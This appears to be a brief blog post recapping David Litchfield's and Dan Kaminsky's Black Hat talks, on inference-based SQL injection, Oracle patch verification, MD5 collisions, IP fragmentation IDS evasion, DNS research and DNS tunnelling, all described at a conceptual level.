Blackhat Day 1: Litchfield and Kaminsky

by Derek Vadala

Attended David Litchfield's talk-- All New 0-day-- this morning. His talk was split into two mini talks, the first covering what he calls SQL Injection and Data Mining Through Inference. The idea is an offshoot of SQL timing attacks, but uses boolean logic to return arbitrary, but meaningful, errors, from the injection attack. By forcing predictable, boolean errors, or really any type of output, he is able to reveal the actual binary information returned by the database.

The second part of his talk, Oracle Patching and Knowing If You Are Not, focused on techniques for determining whether vendor patches actually fix what they claim to. While it focused on Oracle, I'm sure these techniques could be easily applied to other applications/platforms. His slides and a whitepaper are forthcoming.

Dan Kaminsky covered a wide range of topics. First he showed an example of two web pages that yield the same MD5 sum-- already on his site.

Next, he explained some issues with IP fragmentation, illustrating his ability to exploit the disparity between IDS and host timeouts to force reassembly of two distinct (one noise and one an attack) fragmented payloads using the same fragmented data stream.

He went on to explain that he had been given access to a really large pipe on which he is able to conduct Internet-scale research. His first target: trust relationships in the DNS infrastructure, especially noting the reflexiveness involved in PTR lookups as well as the arbitrary, but predictable, UDP ports left open by client queries. He also alluded to, but didn't disclose, some major issues for concern that he has detected.

After that, he illustrated a rapid network mapping project in which he was able to incorporate real-time traceroute data into a Internet map using the Boost Graphics Library. He didn't go into a lot of detail on how the visualizations were created, but in my quick assessment, his prototype already seemed worlds ahead of the "mapping" features that most SIM (event correlation vendors) tout. It was hard to tell if the BGL was largely to do with it, and not necessarily the data set.ß

He ended with a demo of a 64KB/s video feed tunneled through DNS-- Lord of the Dance/Sith from Adult Swim.